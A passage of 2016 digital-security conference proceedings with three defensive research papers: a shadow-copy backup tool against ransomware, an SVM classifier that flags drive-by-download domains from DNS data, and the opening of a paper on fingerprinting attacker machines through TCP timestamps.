program was evaluated by test users from the
viewpoint of usability. In this paper, Section 2
describes the backup process using VSS. We
deal with related studies and existing tools in
Section 3. We describe an overview of
ShadowBox in Section 4, and present the
details of the developed VSSManager in
Section 5. The result of the evaluation of
VSSManager is shown in Section 6, and future
work is described in Section 7. Section 8
concludes the paper.

Table 1. 100 GB file backup (HDD)

Processing time
Data capacity

Normal Copy
777.4 sec
100 GB

VSS
3.7 sec
55.5 MB

3 EXISTING TOOLS AND RELATED


STUDIES
3.1 Previous Versions and ShadowExplorer
Some of the backup tools used for VSS include
Previous Versions and ShadowExplorer.
Windows has a Previous Versions that creates a
shadow copy, sets a storage area, and then
restores the file [2]. Figure 1 shows the dialog
boxes of Previous Versions. ShadowExplorer
lists the backup files and restores any files from
the shadow copy [3]. Figure 2 shows a
screenshot of ShadowExplorer.

2 BACKUP USING SHADOW COPY


VSS is a Windows function for creating
snapshots, i.e., shadow copies. It can duplicate
stored files in a special area, and these files can
be restored even if the original files are deleted.
First, VSS takes a snapshot in order to record
the state of the storage. It subsequently
replicates individual files each time they are
deleted or modified. Therefore, the backup time
is short compared with that for other methods.
Moreover, the data capacity for backup using
shadow copies can be decreased, because only
the modified or deleted data are stored. Table 1
shows the time and space required for the
backup of a normal copy and a shadow copy of
a file with a size of 100 GB on a HDD. In
addition, though a traditional backup cannot
copy files that are either running or are locked,
VSS can copy a file in any state.

ISBN: 978-1-941968-37-6 2016 SDIWC

Figure 1. Previous Versions (Left: system properties,


Right: volume properties)

Figure 2. ShadowExplorer

3.2 Problems with existing tools


As described in Section 3.1, Previous Versions
creates a shadow copy, sets the storage area,

55

Proceedings of the Third International Conference on Digital Security and Forensics (DigitalSec), Kuala Lumpur, Malaysia, 2016

and then restores the file. However, these


functions are executed in separate dialog boxes.
For example, the System Properties dialog box
is used to set the storage area and create the
shadow copy. The Volume Properties dialog
box is then used to restore a file from the
shadow copy. In other words, Previous
Versions does not have unified functions for
handling the shadow copy. Protecting the data
is inconvenient for the user because the backup
and restore functions are separate. As a result,
measures against an attack cannot be carried
out. Opinions such as much time and effort is
required before starting the operation and
operation is difficult to understand were
given by users. Therefore, Previous Versions
has a problem with its operation.
ShadowExplorer was developed for restoring
files. It is impossible to use it for creating a
shadow copy and setting the parameters for
restoring. In addition, the operation of
ShadowExplorer is difficult to understand. For
example, ShadowExplorer makes it impossible
to return to folders in an upper hierarchy in
order to open a folder. Moreover, information
about the file cannot be shown in the file table
for ShadowExplorer. These issues make it
difficult to search for a file. Table 2 shows the
functions of the existing tools. The circles
indicate implemented features. From Table 2,
we can see that the functions of these tools are
disjointed and therefore difficult to use
collectively.
Table 2. Functions of existing tools

Function
Create SC*
Delete SC
Set storage
List SC
Restore file
Search file

Previous Versions
System Volume

Shadow
Explorer

*Shadow Copy

ISBN: 978-1-941968-37-6 2016 SDIWC

3.3 Related studies


No backup tools against ransomware or
unauthorized deletion are currently supported
by SSDs. This includes VSS, and a new backup
tool based on VSS has not yet been proposed.
However, many backup tools have been
proposed for cloud computing and peer-to-peer
networks. Arthur et al. (2011) proposed a
secure cloud backup system [4]. This system
manages backup data and ensures the safety of
the data by encryption. However, the backup
time depends on the online baud rate, so these
systems are not suitable for replicating a large
number of files. Yoshida et al. (2016) built a
backup system for disaster or failure using a
peer-to-peer network [5]. This system builds a
network of trusted users. As a result, it achieves
the needed redundancy, dispersion and security.
These systems can protect data from
ransomware and release data from a local
device. However, if one of the users is a
malicious person, these systems cannot protect
the data.
4 PROPOSAL OF SHADOWBOX
4.1 Overview of the proposed tool
The purpose of this study is safe management
of data by the development of ShadowBox,
which has a function to protect shadow copy
files from attacks by malicious persons or
ransomware. The main features of the
implementation are described below in steps 13.
1.
2.
3.

Create a shadow copy and restore a file.


Protect the shadow copy from an
unauthorized deletion command.
Provide the information gathered in step 2
to the administrator.

Step 1 is a basic function found in traditional


backup tools. ShadowBox makes it possible to
use the function easily and efficiently by
solving the problems of the existing tools.

56

Proceedings of the Third International Conference on Digital Security and Forensics (DigitalSec), Kuala Lumpur, Malaysia, 2016

Moreover, it prevents incorrect deletions and


manages data by implementing the functions in
steps 2 and 3. ShadowBox also provides a
unified function for safely protecting data in a
PC.
4.2 Proposed method
ShadowBox is made up of three applications:
VSSManager, VSSaver, and VSSLogger.
VSSManager is a tool for easily backing up and
restoring files using VSS. VSSaver and
VSSLogger are used cooperatively to protect
the shadow copy area and to keep a log of
attacks to this area. ShadowBox starts VSSaver
as a resident application and monitors the
Delete command given to the shadow copy area.
If a process attempts to delete the shadow copy
area, it detects the attempt and stops the process.
At the same time, ShadowBox starts
VSSLogger. VSSLogger identifies the parent
process that issued the Delete command. This
information and a dump file are then provided
to the administrator. If the file is encrypted by
ransomware, VSSManager restores the file
from the data in the shadow copy. Figure 3
shows the structure of ShadowBox. We
developed VSSManager first, and it is the only
currently developed application. VSSManager
is further described in the next section.

5 DEVELOPMENT of VSSManager
5.1 Development environment
VSSManager is written in C# and runs in
Windows 7. The total number of lines in the
developed program is approximately 4617.
Table 4 shows the development environment of
VSSManager. ShadowBox uses the AlphaVSS
library to create the shadow copy and to list the
backup files. [6]
Table 3. Development environment

OS
Language
Library
Lines

Windows 7
C#
.NET Framework4.0
AlphaVSS.1.2.4000.3
4617

5.2 Overview of VSSManager


VSSManager, which was developed to solve
the problems described in Section 3.2,
implements the functionality required by the
user at the time of backup and restore. We
developed a GUI by assuming the operation of
typical
users.
As
mentioned
earlier,
VSSManager has the ability to create and
manage the shadow copy, and restore a file.
VSSManager can efficiently back up data and
restore files by unifying the basic functions.
Table 4 shows the problems of existing tools
and the improvement by VSSManager.

Figure 3. Overview of ShadowBox

ISBN: 978-1-941968-37-6 2016 SDIWC

57

Proceedings of the Third International Conference on Digital Security and Forensics (DigitalSec), Kuala Lumpur, Malaysia, 2016

Table 4. Problems and improvements of existing tools

Problems with
existing tools
Cannot collectively
use the functions

VSSManager

Has centralized
functions (described
in Section 5.1)
Cannot create a
Selects volumes
shadow copy on a
when creating the
per-volume basis
shadow copy
Searches files that
Allows searches for
target a single
multiple shadow
shadow copy
copies
Difficult to set
Has an intuitive user
storage
interface
Not enough displayed Displays files with
file information
icons or thumbnails
Troublesome to move Implements back
between folders
and forward
buttons and displays
current folder path
We developed the user interface to help the
typical user to conduct backups easily. In
Previous Versions, the shadow copy is created
automatically and controlled by the Windows
OS. However, because a complex procedure is
required to create the shadow copy, it is
difficult for users to execute the application in a
timely manner. Therefore, we developed the
function to set the timing freely when creating
the shadow copy using Previous Versions.
VSSManager has the functions Create shadow
copy, Manage storage, Restore a file, and
Search for a file. Figures 4-7 show the dialog
boxes of VSSManager.

Figure 4. Dialog for creating a shadow copy

ISBN: 978-1-941968-37-6 2016 SDIWC

Figure 5. Dialog for setting storage

Figure 6. Dialog for restoring file

Figure 7. Dialog for searching for file

6 EVALUATION
6.1 Method of evaluation
An evaluation was conducted to determine
whether the developed tool is suitable for
operation by a typical user. Ten students in our
laboratory participated as users in the
experimental evaluation. They used the
developed VSSManager as well as existing
tools. The users were taught how to use the
tools in advance. They evaluated the usefulness
with a five-point score. Here, very hard to use
was 1 and very easy to use was 5. Moreover,
the users described their impressions of using
the tools.

58

Proceedings of the Third International Conference on Digital Security and Forensics (DigitalSec), Kuala Lumpur, Malaysia, 2016

6.2 Results of evaluation

7 FUTURE WORK

Table 5 shows the evaluation results. As


mentioned above, very hard to use was 1 and
very easy to use was 5. The table shows the
average values of the evaluations of Previous
Versions and ShadowExplorer along with
VSSManager.

7.1 Improvement of VSSManager

Table 5. Evaluation of tools (SC=shadow copy)

Function
Creation of
SC
Setting
storage
Searching
for file

Previous Shadow
VSS
Versions Explorer Manager
2.6

4.7

1.5

4.9

3.4

3.0

3.6

From Table 5, VSSManager obtained a higher


rating than the existing tools in the creation of a
shadow copy and setting the storage area from
the viewpoint of Creation of shadow copy
and Setting storage area. From the result, it is
considered that VSSManager offers simplified
and intuitive operation. In the users opinions,
VSSManager would obtain better evaluations if
given more options to evaluate, such as fewer
steps and operation easy to understand.
Therefore, we can verify that we were able to
achieve the purpose of this research. On the
other hand, the file search function is almost
identical for VSSManager and existing tools.
Some opinions about the file search included it
was very hard to search for a file. Therefore, a
more effective file search function is required.
In addition, one opinion was that it was difficult
to become familiar with the user interface of
VSSManager. The presumed reason is that the
users normally use the Windows OS and
manipulate files in Windows Explorer. For this
reason, they think it is easier to use Previous
Versions, which is similar to Window Explorer.
That is, because the look and feel of
VSSManager is different from that of Windows
Explorer, they might feel a sense of incongruity.

ISBN: 978-1-941968-37-6 2016 SDIWC

From the results of the experimental evaluation,


we know that the file search function should be
improved. In the case of VSSManager, the
function to search for files directly by file name
is not effective, because sometimes there are a
very large number of matches. Moreover, the
user sometimes does not remember the file
name. Therefore, an approach different from
using the filename is required. We suggest a
new feature that lists the deleted files and the
updated files to make it easier to find the
desired file. The following two approaches can
be considered. After implementing the
following two approaches in VSSManager, the
user could evaluate them.
Approach 1: Compare the current volume and
the shadow copy.
This approach compares the file in the current
volume and the file in the shadow copy.
Then, deleted files are defined as those that
exist only on the shadow copy side. Updated
files are defined as having an equivalent and
updated timestamp. This approach significantly
narrows down the number of target files, and so
it would be possible to reduce the effort to look
for files. Figure 8 shows a method to compare
the current volume and the shadow copy.

Figure 8. Approach 1: Comparing the current volume


and the shadow copy

59

Proceedings of the Third International Conference on Digital Security and Forensics (DigitalSec), Kuala Lumpur, Malaysia, 2016

Approach 2: Detect the deleted files


This method monitors the files in the volume
and records the paths of the deleted files. Then,
in the shadow copy, it enumerates the files that
have been deleted by referring to the file paths.
This approach reduces the time to find the
desired files. Figure 9 shows the method for
detecting the deleted files.

REFERENCES
[1]

A.Yamamae, Y.Kobayashi, T.Uehara, R.Sasaki,


Experiment and evaluation of recoverability of
removed files in SSD, IPSJ SIG-DPS, 2015-DPS162, 39, 1 7, 2015-02-26

[2]

Volume Shadow Copy Service,


https://msdn.microsoft.com/enus/library/windows/desktop/bb968832(v=vs.85).asp
x

[3]

How do I configure and use shadow copy in


Microsoft Windows?,
http://www.techrepublic.com/blog/windows-andoffice/how-do-i-configure-and-use-shadow-copy-inmicrosoft-windows/

[4]

A.Rahumend, H.Chen, Y.Tang, P.Lee, and J.Lui, A


Secure Cloud Backup System with Assured Deletion
and Version Control International Conference on
Parallel Processing Workshops, 40, 160-167, 2011.9.

[5]

T.Yoshida, T.Odaka, J.Kuroiwa and H.Shirai, Fault


Tolerant Data Backup System Using Peer-to-Peer
Network 64, 57-632016-2.

[6]

AlphaVSS, http://alphavss.codeplex.com/

Figure 9. Approach 2: Detect the deleted files

7.2 Development of ShadowBox


VSSManager is one of the existing applications
of ShadowBox. The goal of this study is the full
development of ShadowBox. Therefore, we are
now developing the two remaining applications,
VSSaver and VSSLogger. Once developed.
VSSaver and VSSLogger will be evaluated for
security and usability.
8 CONCLUSION
We proposed the unified tool named
ShadowBox, which helps typical users to create
a shadow copy and to restore data from it. This
tool has a function to protect the data in the
shadow copy against the attacks of ransomware
or malicious internal persons. ShadowBox
consists of three applications, VSSManager,
VSSaver, and VSSLogger. VSSManager,
which is the only application that we have
actually developed, is a tool for easily backing
up and restoring files using a shadow copy. The
experimental results showed that the usefulness
of the program is better than that of existing
tools. In the near future, we will improve the
searching function of VSSManager and
continue to develop and evaluate VSSaver and
VSSLogger.

ISBN: 978-1-941968-37-6 2016 SDIWC

60

Proceedings of the Third International Conference on Digital Security and Forensics (DigitalSec), Kuala Lumpur, Malaysia, 2016

Countermeasure against Drive by Download Attack by Analyzing Domain


Information
Tadashi Kimura and Ryoichi Sasaki
Tokyo Denki University
Senjuasahicho 5, Adachi-ku, Tokyo-to, 120-8551 JAPAN
[email protected], [email protected]

ABSTRACT
In recent years, malware infections by Drive by
Download (DbD) attacks carried out with the
cooperation of malicious web sites have caused
serious damage. The blacklist method is a current
typical countermeasure that blocks access to a
malicious web site registered to a blacklist when the
users PC does a redirect. However, the attacker can
install malicious web sites one after another, and it
is impossible to add the malicious web sites to the
blacklist immediately. Thereby, countermeasures
against new malicious web sites are difficult using
this method. To cope with this issue, we propose a
method that utilizes a support vector machine
(SVM) and the data in a domain name system
(DNS) to identify the domain used in the DbD
attack. The result of an experiment showed a
detection rate of 92.75%.

KEYWORDS
Drive by Download
Domain Name System
WHOIS
Support Vector Machine,
Akaikes Information Criterion

1. Introduction
In recent years, malware infections by Drive
by Download (DbD) attacks have caused
serious damage. DbD attacks are carried out
with the cooperation of malicious web sites [1].
Figure 1 shows the flow of a DbD attack.

ISBN: 978-1-941968-37-6 2016 SDIWC

Figure 1. Flow of DbD attack.

The blacklist method is a current typical


countermeasure against DbD attacks that blocks
access from a users PC to a malicious web site
that is registered in a blacklist stored in the
users PC. However, attackers can change an
ordinary web site to a new malicious web site
one after another. Although the blacklist is
updated every day, there is a delay between
updates [2]. Therefore, measures against newly
established malicious web sites have become an
urgent need.
Therefore, we focus on the domain
information in the domain name system (DNS).
We have analyzed the domains of web sites
related to DbD attacks (DbD domains) and the
domains of legitimate web sites (benign
domains). Based on the results, we confirmed
that there is a difference in the numbers and
values of domain information.
In this paper, we propose a method using a
support vector machine (SVM) [3] and DNS
data to identify domains. We conducted
experiments combining domain information to
derive the optimal combinations for the
identification of DbD domains.

61

Proceedings of the Third International Conference on Digital Security and Forensics (DigitalSec), Kuala Lumpur, Malaysia, 2016

The proposed method stops access to a URL


that contains a domain classified as a DbD
domain. Thereby, this method is considered to
be able to stop access to DbD attack sites that
have not been posted on the blacklist.

information were converted to the amounts of


set feature values. In addition, we conducted a
classification experiment by the SVM for all
combinations of domain information.
3.1 Domain information

2. Related Work
Okayasu et al. proposed a specific method
using the SVM and domain information in the
DNS to classify a domain in order to identify
the command and control (C&C) server of a
botnet [4].
Ma et al. also proposed a countermeasure
using domain information to identify malicious
web sites used for phishing or spam attacks [5].
Moreover, approaches that detect obfuscated
JavaScript have been proposed by many
researchers to find a DbD. Here, obfuscated
JavaScript is JavaScript program code that
contains inserted characters representing
malicious behavior.
Jodavi et al. proposed a detection method
that uses the frequency of a hidden function in
JavaScript and the maximum value of the depth
of the eval nest [6]. Su et al. proposed a
countermeasure using an information theoretic
index against obfuscated JavaScript [7].
Jayasinghe [8] proposed a detection method
using the Opcode log obtained from the
JavaScript engine.
However, a method to classify a domain by
using SVM and DNS domain information to
identify web sites used for a DbD attack has not
previously been proposed.
3. Proposed Research Method
In this study, we conducted a classification
experiment using the SVM and domain
information. The SVM used a machine learning
library written in Python and named scikit-learn [9].
As a preliminary survey in the experiment,
first we obtained the domain information of a
DbD domain and a benign domain by querying
the DNS server. Next, the numbers and values
of the record of the acquired domain

ISBN: 978-1-941968-37-6 2016 SDIWC

The domain information used in the


experiment was obtained by querying the DNS
server. Table 1 shows the acquired domain
information and research methods.
Table 1. Domain information and research methods
No.
Domain
Library and
information
command for
research
1
TTL
Resolv
2
MINIMUM
Resolv
3
RETRY
Resolv
4
EXPIRE
Resolv
5
REFRESH
Resolv
6
MX record
Resolv
7
NS record
Resolv
8
TXT record
Resolv
9
Preference
Resolv
10
TXT-Strings
Resolv
11
A record
DNS-Client
12
Country
DNS-Client
13
Registration
WHOIS command
period

As the domain information, information of


numbers 1 to 5 is described in the start of
authority (SOA) record. Information of
numbers 6 to 8 and 11 is described in the DNS
record. Number 10 is the number of strings of a
TXT record. Number 12 is the assigned country
of the domain. Number 13 is the number of
days until the expiration date of the domain
from its date of registration.
In this study, the Resolv library [10] acquired
the information for numbers 1 to 10, the DNS
Client library [11] for numbers 11, 12, and the
WHOIS command for number 13.

62

Proceedings of the Third International Conference on Digital Security and Forensics (DigitalSec), Kuala Lumpur, Malaysia, 2016

3.2 SVM
The SVM is one of the supervised learning
models used in machine learning, and it can be
applied to classification and regression.
The first feature of the SVM is linear
mapping, which enables linear classification by
converting the data. The second feature is
margin maximization. A margin is the smallest
value of the distance to the identification
surface and the individuals belonging to each
group. Each individual is called a Support
Vector, which represents the shortest distance
to the identification surface. Learning is done to
maximize the margin between the identification
surface and the Support Vector, and as a result,
Support Vectors exhibit high identification
performance. Figure 2 shows a schematic
diagram of the classification by the SVM.

Figure 2. Schematic diagram of the SVM.

3.3 Cross-validation
If the sample data for obtaining test and
training data are small, an error in the
classification accuracy can possibly occur.
Therefore, we conducted the experiment by
using the cross-validation [12] method for
verifying the validity of the classification
accuracy.
Figure 3 shows a schematic diagram of the
cross-validation method. We experimented with
10-fold cross-validation. Primarily, we divided
the sample data by 10. One sample was test
data, and the rest were training data. After
replacing the test data and the training data,

ISBN: 978-1-941968-37-6 2016 SDIWC

cross-validations were performed a total of 10


times. The estimated detection rate was the
average value of the accuracy in the 10
experiments. The method of calculating the
detection rate is described in Section 5.1.

Figure 3. Schematic diagram of cross-validations.

4. Experimental Dataset Analysis


4.1 Experimental dataset
We used 200 DbD domains and 200 benign
domains in the experiment.
DbD domains have been used to extract the
domain from the URL included in the Drive by
Download Marionette (D3M) Dataset 2015 [13].
The D3M dataset is a DbD attack
communication record provided by the MWSAnti-malware research personnel training
workshop [14].
The domain information of a benign web site
depends on the scale of the web site. Therefore,
it is possible for a deviation to occur in a
dataset due to the chosen benign web site.
Therefore, we collected domains from largescale web sites, middle-scale web sites, and
small-scale web sites. Large-scale web sites
were collected from Alexa in The top 500 sites
on the web [15]. Middle-scale web sites were
collected from Fortune 500s worlds largest
company rankings [16]. Small-scale web sites
were also collected from Fortune 500s middleand small-scale company rankings. Table 2
shows the number of domains in each of the
experimental datasets.

63

Proceedings of the Third International Conference on Digital Security and Forensics (DigitalSec), Kuala Lumpur, Malaysia, 2016

Table 2. Experimental datasets


Domains
DbD attack site
200
Large-scale web site
100
Middle-scale web site 70
Small-scale web site
30

4.2 Domain information survey result


The result of the trial investigation confirmed
a particularly large difference in the name
server (NS) records and the registration period.
The NS record is intended to define the DNS
server that manages the zone information for a
domain.
In the survey result of the obtained NS records,
80% of the benign domains had three or more
NS records whereas 20% of the DbD domains
had the same number of records. Because the
attacker makes successive installations of attack
sites, it is considered that an attacker does not
have enough time to set the NS record. Figure 4
shows the survey results of the NS records.

Figure 4. Survey result of NS records.

Next, Figure 5 shows the research result of


the registration period. The registration period
of the benign domain was longer than that of
the DbD domain. For this reason, it is thought
that the attacker mainly uses the web domain
for the DbD attack just after creating it.

ISBN: 978-1-941968-37-6 2016 SDIWC

Figure 5. Survey result of the registration period.

4.3 Amounts of set feature values


Before performing an experiment, scaling to
convert the domain information in the amounts
of set feature values is carried out. It is possible
to prevent an information drop by scaling. Here,
the amounts of set feature values is the preset
value for the range, which can be taken from
the extracted feature quantity.
For example, when the registration period is
less than 4000 days and more than 6000 days, a
large difference occurs in the percentage of
DbD domains and benign domains. Therefore,
the amounts of set feature values is the number
of days to the boundary value. in the
registration period Table 3 shows amounts of
set feature values of the registration period.
Nil in the table indicates that the registration
period cannot be acquired.
Table 3. Amounts of set feature values of the
registration period
Registration
Amounts of set
period
feature values
nil, 1 4000 1
4001 6000
2
6001 3

5. Evaluation
5.1 Evaluation method
The detection rate was calculated based on
the number of domains that were determined
accurately. Table 4 shows the domain detection
results. The result is True Positive (TP) if the
DbD domain is correctly determined as a DbD

64

Proceedings of the Third International Conference on Digital Security and Forensics (DigitalSec), Kuala Lumpur, Malaysia, 2016

domain; otherwise, the result is False Negative


(FN). Additionally, the result is False Positive
(FP) if a benign domain is determined to a DbD
domain; otherwise, the result is True Negative
(TN).
Table 4. Domain detection results
Determined
Determined
to be a DbD
to be a benign
domain
domain
DbD
TP
FN
domain
Benign
FP
TN
domain

Each of the detection rates is obtained from


formula (6) below.
In addition, the balance of the goodness of the
complexity and the data of the statistical model
was evaluated by Akaikes Information
Criterion [17].
+

Accuracy = +++

(6)

Akaikes Information Criterion (AIC) is an


indicator for evaluating the goodness of the
statistical model.
As the number of parameters increases, the
detection rate tends to increase. However,
because the AIC is affected by noise, it is
possible for the reliability to decrease.
Therefore, it is possible to derive the optimal
number parameter by calculating and
comparing the AIC with the experimental
results. In many cases, the number of
parameters needed to calculate the minimum
AIC is the optimal number of parameters.
The AIC is determined by formula (7), where
L is the maximum likelihood, which is derived
by a positive number of detected and detective
rates. K indicates the number of parameters to
be used in the experiment.
AIC = -2 log L + 2K

(7)

The F-measure is an indicator used to


comprehensively evaluate the completeness and

ISBN: 978-1-941968-37-6 2016 SDIWC

the accuracy of the classification results. The Fmeasure is calculated by formula (8). Precision,
which is an indicator of the accuracy of the
compliance rate, is calculated by formula (9). In
addition, Recall, which is an indicator of the
completeness, is calculated by formula (10).
F measure =
Precision =
Recall =

(8)

(9)

(10)

5.2 Result of experiment


We describe the classification result of the
domains. Table 5 shows the highest detection
rate and the AIC for the numbers of parameters.
Table 5. Domain classification result
Number of
Highest
AIC
parameters
detection rate
2
87.50%
97.47
3
91.00%
74.66
4
92.75%
63.84
5
92.75%
65.84
6
93.00%
65.99
7
93.25%
66.13
8
93.25%
68.13
9
93.25%
70.14
10
93.25%
72.14
11
92.25%
81.53
12
92.00%
85.37
13
92.50%
83.69

In the result of this experiment, 93.25% was


the highest detection rate for 7, 8, 9, 10
parameters.
However, if the AICs are compared, 63.84 is
the minimized AIC for 4 parameters. Therefore,
the number of optimal parameters is 4.
Table 6 shows the combination of domain
information of the 4 optimal parameters to
calculate the detection rate 92.75%.
MINIMUM represents the validity period of
the negative cache. A negative cache is a

65

Proceedings of the Third International Conference on Digital Security and Forensics (DigitalSec), Kuala Lumpur, Malaysia, 2016

mechanism to cache information that did not


exist when making an inquiry to a non-existent
domain.
EXPIRE represents the period until the
current data is discarded in the case that the
secondary server
fails to REFRESH
continuously. REFRESH is the interval at
which the secondary server queries the update.
Table 6. Optimal parameters
Domain information
MINIMUM Registration
TXTperiod
Strings

EXPIRE

Table 7 shows the detection result of each


scale of the domain.
Table 7. Detection result of each scale of the domain
Domain
Sample Positive Negative Detection
data
number number
rate
of
of
detected detected
DbD
200
185
15
92.50%
Domain
Large-scale 100
91
9
91.00%
web site
domain
Middle70
66
4
94.29%
scale web
site domain
Small-scale 30
29
1
96.67%
web site
domain

Table 8 shows the F-measure, Precision and


Recall of the optimal parameters.
Table 8. F-measure, Precision and Recall of the
optimal parameters
F-measure
Precision
Recall
0.9273
0.9296
0.9250

6. Consideration
In the experiment, the detection rate of the
optimal parameters was 92.75%. Therefore, the
proposed method of this study is inferior in
terms of the detection rate in comparison with
the methods of related work.

ISBN: 978-1-941968-37-6 2016 SDIWC

However, when attention is paid to the


processing speed, the proposed method in this
study is often superior in terms of processing
speed. The reason for the increased processing
speed is the JavaScript program is found in
many web sites and the computation is required
for every JavaScript program in a web site.
The registration period is always included in
the combination of domain information when
calculating the highest detection rates by the
number of parameters. Therefore, it was found
that the registration period affects most
classifications of domain information.
In addition, some of the differences in the
detection rate of each scale of a benign domain
have been confirmed. Thus, it is considered that
the optimal parameters can possibly vary
depending on the scale of the domain.
Therefore, we consider that the optimal
parameters for each scale of a benign domain
can be derived.
7. Conclusion
We proposed a method using a support
vector machine (SVM) and the data in a
Domain Name System (DNS) to identify the
domain used in a DbD attack. The result of
experiments showed that the detection rate was
92.75% by the proposed method. The
parameters to obtain the detection rate were
MINIMUM, Registration period, TXT-Strings
and EXPIRE.
Next, we plan to obtain the optimal
parameters for each scale of the benign domain.
In addition, we would like to improve the
detection rate by combining our method with a
method proposed by other researchers.
REFERENCES
[1]

Drive by Download:The Web Under Siege,


http://www.viruslistjp.com/analysis/?pubid=204792
056

[2]

URL.Blacklist.com, http://urlblacklist.com/

[3]

History
of
Support
Vector
http://www.svms.org/history.html

Machines,

66

Proceedings of the Third International Conference on Digital Security and Forensics (DigitalSec), Kuala Lumpur, Malaysia, 2016

[4]

SHOTA OKAYSU, RYOICHI SASAKI: Proposal


and Evaluation of Methods using the Quantification
Theory and Machine Learning for Detection C&C
Server used in Botnet, DICOMO2015, pp911917(2015)

[5]

Justin Ma, Lawrence K.Saul, Stefan Savage, and


Geoffrey M.Voelker : Beyond Blacklists:Learning to
Detect Malicious Webth Sites from Suspicious URLs,
Proceeding of the 15 ACM SIGKDD international
conference on Knowledge discovery and data
mining(KDD 09), pp.1245-1254 (2009)

[6]

Merhan Jodavi, Mahdi Abadi, and Elham Pah :


DbDHunter:An Ensemble-based Anomaly Detection
Approach
to Detect Drive-by Download Attacks,
2015 5th International Conference on Compoter and
Knowledge Engineering(ICKKE), pp.273-278(2015)

[7]

Jiawei Su, Katsunari Yoshioka, Junji shikata,


Tsutomu
Matsumoto:
Detection
obfuscated
malicious JavaScript based on information-theoretic
measures and novelty detection, CSS2015, Vol.2015,
No.3, pp226-233(2015)

[8]

Gaya K.Jayasinghe, J.Shane Culpepper,and Peter


Betrok : Efficient and effective realtime prediction
of drive-by download attacks, Journal of Network
and Computer Applications 38, pp.135-149(2014)

[9]

scikit learn:machine-learning in
http://scikit-learn.org/stable/index.html

[10]

Library Resolv:Ruby 2.1.0, http://docs.rubylang.org/ja/2.1.0/library/resolv.html

[11]

DNS
Client
Library
for
http://simpledns.com/dns-client-lib.aspx

[12]

Kohavi, Ron: A study of cross-validation and


bootstrap for accuracy estimation and model
selection,
Proceedings
of
the
Fourteenth
International Joint Conference on Artificial
Intelligence 2, pp.11371143.(1995)

[13]

M.Kamizono, M.Akiyama, T.Kasama, J.Murakami,


M.Hatada, M.Terada: Datasets for Anti-Malware
Research ~MWS Datasets 2015~, CSEC2015,
Vol.2015-CSEC-70No6(2015)

[14]

MWS-Anti-malware research personnel training


workshop, http://www.iwsec.org/mws/2015/

[15]

Alexa:
The
top
sites
http://alexa.com/topsites

[16]

Fortune: Fortune500-Daily&Breaking
News, http://fortune.com/

[17]

H. Akaike, S. Amari, G. Kitagawa, Y. Kabashima, H.


Simodaira, Akaike's Information Criterion, AIC,
2007.

on

Python,

.NET,

the

ISBN: 978-1-941968-37-6 2016 SDIWC

web,

Business

67

Proceedings of the Third International Conference on Digital Security and Forensics (DigitalSec), Kuala Lumpur, Malaysia, 2016

Fingerprinting Violating Machines with TCP Timestamps


Mohammed I. Al-Saleh
Jordan University of Science and Technology
Department of Computer Science
P.O. Box 3030
Irbid, Jordan 22110
[email protected]

Abstract
Cyber crime has increased as a side effect of the
dramatic growth in Internet deployment. Identifying machines that are responsible about crimes
is a vital step in an attack investigation. Tracking the IP address of the attacker to its origin is
indispensable. However, apart from finding the attackers (possible) machine, it is inevitable to provide supportive proofs to bind the attack to the
attackers machine, rather than depending solely
on the IP address of the attacker, which can be dynamic. This paper proposes to implant such supportive proofs by utilizing the timestamps in the
TCP header. Our results show that unique timestamps can be recovered in target machines. In addition, because a violator is unaware of (and has
no control over) the internals of the TCP, the investigation process is empowered with stealth. To
the best of our knowledge, we are the first to utilize protocol remnants in fingerprinting violating
machines.

Introduction

Since cyber crimes are delivered through the network, security analysts need to understand the networks internal functionalities so they can reason
about attacks and draw conclusions. Basically, a
computer network is a set of nodes, links, and
protocols that enable the nodes to communicate

ISBN: 978-1-941968-37-6 2016 SDIWC

through the links. The protocols are the building blocks of computer networks, starting from the
physical layer (according to the OSI networking
model) up to the application layer.
A violating machine can be geolocated by tracking its IP address. An investigator might look
through the captured machine, seeking crime
proofs in high-level data sources. Such sources include (but are not limited to) files, processes, modules, registries, sockets, log files, browsing histories,
and strings. However, an attacker who is aware of
such sources might manage to hide or destroy them.
Furthermore, the captured machine might not really be the machine used in the attack because of
the dynamic nature of the IP addresses. Given
that, additional supportive proofs are needed to
show that the captured machine is really the machine that launched the attack. Practically, this
is not a problem with the machines having static
IP addresses. However, such binding is necessary
when DHCP is used.
This paper tries to bind the attack to the captured machine by inspecting the machine for some
intentionally remotely implanted marks in the internal data structure of the TCP. These marks are
unnoticed by the attacker because she is unaware
of how the TCP internally manage and store packets and she has no control over their functionalities.
This stealthiness is another advantage of this technique.
After receiving packets, network protocols do
some processing before delivering payloads to

68

Proceedings of the Third International Conference on Digital Security and Forensics (DigitalSec), Kuala Lumpur, Malaysia, 2016

higher protocols. That might include preparing/decoding headers, computing error checking
codes, and encrypting/decrypting data. All such
processing only takes place for data in memory:
data never goes to permanent storage unless some
monitoring or logging tools are explicitly activated
and configured to do so. This paper only seeks
in-memory artifacts.
This paper is organized as follows. In Section 2,
we give a brief overview of the TCP protocol and
highlight some of its header fields which we will
utilize in this study. Our investigation model is
presented in Section 3. This is followed by Section 4
that explains our experimental setup. Our results
are shown in Section 5. A discussion and future
work are covered in Section 6. This is followed by
related work and the conclusion.

Figure 1: The TCP header. Reproduced from


http://http://archive.is/www.troyjessup.com

Transmission Control Protocol (TCP)

This section illustrates some important aspects of


the TCP protocol. This background is not meant
to show how the TCP generally works nor to be
complete, but rather we intend to highlight some
of the TCP issues.
The TCP protocol provides process-to-process
communication channels. The most attracting feature the TCP ensures is reliability. Furthermore,
the TCP preserves connections states and bytes orders. Many well-known high-level protocols (such
as HTTP, HTTPS, SMTP, and FTP) use the TCP
protocol. Figure 1 shows the TCP header. The
TCP maintains reliable transmission through the
acknowledgements and timeout mechanism. The
TCP establishes a connection with a server using
the well-known three-way handshake process (see
Figure 2). Among the TCP Options of TCP header
is the Timestamp, which is 32-bit long. This option
can be used for performance and synchronization
issues. In this paper, we will utilize Timestamp to
fingerprint a violating machine.

ISBN: 978-1-941968-37-6 2016 SDIWC

Figure 2: The timeline for the TCP three-way


handshake.

Investigation Model

Figure 3 summarizes our investigation model. The


investigator creates a specially crafted packets and
sends them to a suspect machine. Even though the
suspect can change the IP address so frequently,
the investigators TCP packets will be correctly
